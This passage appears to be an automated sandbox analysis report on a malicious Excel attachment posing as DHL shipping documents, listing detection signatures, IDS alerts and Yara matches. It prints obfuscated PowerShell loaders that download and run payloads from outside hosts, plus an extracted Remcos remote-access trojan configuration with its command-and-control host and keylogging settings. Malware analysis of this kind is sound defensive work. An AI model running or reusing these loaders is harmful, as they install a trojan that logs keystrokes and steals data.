[Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3836, TargetFilename: C:\Users\user\AppData\Local\Temp\iww0kcsz.lnx.ps1

                    Data Obfuscation

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3836, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.cmdline", ProcessId: 3932, ProcessName: csc.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 896, TargetFilename: C:\ProgramData\remcos\logs.dat
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-04T11:55:54.869982+020020241971A Network Trojan was detected192.3.220.2080192.168.2.2249166TCP
                    2024-10-04T11:55:57.341407+020020241971A Network Trojan was detected192.3.220.2080192.168.2.2249168TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-04T11:55:54.869904+020020244491Attempted User Privilege Gain192.168.2.2249166192.3.220.2080TCP
                    2024-10-04T11:55:57.341243+020020244491Attempted User Privilege Gain192.168.2.2249168192.3.220.2080TCP
                    2024-10-04T11:56:16.486316+020020244491Attempted User Privilege Gain192.168.2.2249179192.3.220.2080TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-04T11:56:13.587296+020020204231Exploit Kit Activity Detected192.3.220.2080192.168.2.2249172TCP
                    2024-10-04T11:56:31.547554+020020204231Exploit Kit Activity Detected192.3.220.2080192.168.2.2249181TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-04T11:56:13.587296+020020204251Exploit Kit Activity Detected192.3.220.2080192.168.2.2249172TCP
                    2024-10-04T11:56:31.547554+020020204251Exploit Kit Activity Detected192.3.220.2080192.168.2.2249181TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-04T11:56:15.123739+020020365941Malware Command and Control Activity Detected192.168.2.2249173135.148.195.2486875TCP
                    2024-10-04T11:56:16.018816+020020365941Malware Command and Control Activity Detected192.168.2.2249177135.148.195.2486875TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-04T11:56:16.440946+020028033043Unknown Traffic192.168.2.2249178178.237.33.5080TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000010.00000002.848958157.0000000000791000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "idabo.duckdns.org:6875:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I89M3S", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Source: DHL Shipment Doc's.xlsReversingLabs: Detection: 13%
                    Source: DHL Shipment Doc's.xlsVirustotal: Detection: 14%Perma Link
                    Source: Yara matchFile source: 14.2.powershell.exe.1239d998.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.1239d998.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.849805315.000000000244E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.848958157.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.487528799.0000000000931000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.849173368.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.850008611.0000000003AC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.848958157.0000000000775000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.457736519.000000001239D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3864, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: DHL Shipment Doc's.xlsJoe Sandbox ML: detected
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00404423 FreeLibrary,CryptUnprotectData,20_2_00404423
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,33_2_004338C8
                    Source: powershell.exe, 0000000E.00000002.457736519.000000001239D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_31be488c-a

                    Exploits

                    barindex
                    Source: Yara matchFile source: 14.2.powershell.exe.1239d998.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.1239d998.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.457736519.000000001239D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3864, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00407538 _wcslen,CoGetObject,33_2_00407538
                    Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.22:49170 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.22:49180 version: TLS 1.0
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 213.183.76.21:443 -> 192.168.2.22:49165 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 213.183.76.21:443 -> 192.168.2.22:49167 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 213.183.76.22:443 -> 192.168.2.22:49175 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 213.183.76.22:443 -> 192.168.2.22:49176 version: TLS 1.2
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000E.00000002.476880205.000007FE89A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.478544858.000007FE89C30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.497351507.000007FE89C53000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.pdb source: powershell.exe, 00000019.00000002.473447172.0000000002E60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.pdbhP source: powershell.exe, 00000019.00000002.473447172.0000000002E60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.pdb source: powershell.exe, 00000007.00000002.433523996.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000E.00000002.476880205.000007FE89A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.478544858.000007FE89C30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.497351507.000007FE89C53000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
